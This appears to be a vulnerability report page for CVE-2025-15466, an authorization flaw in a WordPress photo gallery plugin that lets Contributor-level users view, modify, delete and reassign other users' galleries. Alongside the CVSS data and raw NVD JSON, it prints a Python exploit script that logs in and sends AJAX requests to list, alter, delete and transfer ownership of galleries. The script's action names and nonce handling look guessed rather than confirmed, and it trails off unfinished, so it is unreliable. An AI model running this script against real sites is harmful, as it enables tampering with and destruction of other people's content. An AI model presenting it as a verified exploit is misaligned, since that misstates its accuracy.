Security Vulnerability Report
中文
CVE-2025-15466 CVSS 5.4 MEDIUM

CVE-2025-15466

Published: 2026-01-20 00:15:48
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Image Photo Gallery Final Tiles Grid plugin for WordPress is vulnerable to unauthorized access and modification of data due to missing capability checks on multiple AJAX actions in all versions up to, and including, 3.6.9. This makes it possible for authenticated attackers, with Contributor-level access and above, to view, create, modify, clone, delete, and reassign ownership of galleries created by other users, including administrators.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Image Photo Gallery Final Tiles Grid <= 3.6.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-15466 PoC - Final Tiles Grid Plugin Authorization Bypass # Authentication Required: Contributor+ role # Target: WordPress site with Final Tiles Grid plugin <= 3.6.9 import requests import json TARGET_URL = "http://target-wordpress-site.com" USERNAME = "attacker" PASSWORD = "attacker_password" def get_auth_cookie(): """Login and get authentication cookie""" login_url = f"{TARGET_URL}/wp-login.php" session = requests.Session() login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } response = session.post(login_url, data=login_data) return session.cookies.get_dict() def exploit_unauthorized_gallery_access(cookies): """Exploit: Access galleries created by other users""" ajax_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" # List all galleries (including admin galleries) data = { 'action': 'ftg_get_galleries', # Vulnerable endpoint 'nonce': 'any_value' # May not be properly validated } response = requests.post(ajax_url, data=data, cookies=cookies) print(f"Gallery List Response: {response.text}") return response.json() def exploit_gallery_modification(cookies, gallery_id): """Exploit: Modify galleries created by other users""" ajax_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Modify gallery settings data = { 'action': 'ftg_save_gallery', # Vulnerable endpoint 'gallery_id': gallery_id, 'settings': json.dumps({'name': 'Modified by Attacker'}) } response = requests.post(ajax_url, data=data, cookies=cookies) print(f"Modification Response: {response.text}") def exploit_gallery_deletion(cookies, gallery_id): """Exploit: Delete galleries created by other users""" ajax_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" data = { 'action': 'ftg_delete_gallery', # Vulnerable endpoint 'gallery_id': gallery_id } response = requests.post(ajax_url, data=data, cookies=cookies) print(f"Deletion Response: {response.text}") def exploit_ownership_transfer(cookies, gallery_id, new_owner_id): """Exploit: Transfer gallery ownership""" ajax_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" data = { 'action': 'ftg_transfer_ownership', # Vulnerable endpoint 'gallery_id': gallery_id, 'new_owner': new_owner_id } response = requests.post(ajax_url, data=data, cookies=cookies) print(f"Ownership Transfer Response: {response.text}") if __name__ == "__main__": print("Starting CVE-2025-15466 exploitation...") cookies = get_auth_cookie() if cookies: galleries = exploit_unauthorized_gallery_access(cookies) # Additional exploitation steps... print("Exploitation completed.") else: print("Authentication failed.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15466", "sourceIdentifier": "[email protected]", "published": "2026-01-20T00:15:47.820", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Image Photo Gallery Final Tiles Grid plugin for WordPress is vulnerable to unauthorized access and modification of data due to missing capability checks on multiple AJAX actions in all versions up to, and including, 3.6.9. This makes it possible for authenticated attackers, with Contributor-level access and above, to view, create, modify, clone, delete, and reassign ownership of galleries created by other users, including administrators."}, {"lang": "es", "value": "El plugin Image Photo Gallery Final Tiles Grid para WordPress es vulnerable a acceso no autorizado y modificación de datos debido a la falta de comprobaciones de capacidad en múltiples acciones AJAX en todas las versiones hasta la 3.6.9, inclusive. Esto hace posible que atacantes autenticados, con acceso de nivel Colaborador y superior, puedan ver, crear, modificar, clonar, eliminar y reasignar la propiedad de galerías creadas por otros usuarios, incluidos los administradores."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3435746/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0afcfe15-2d7d-4c96-a408-28f35577a927?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.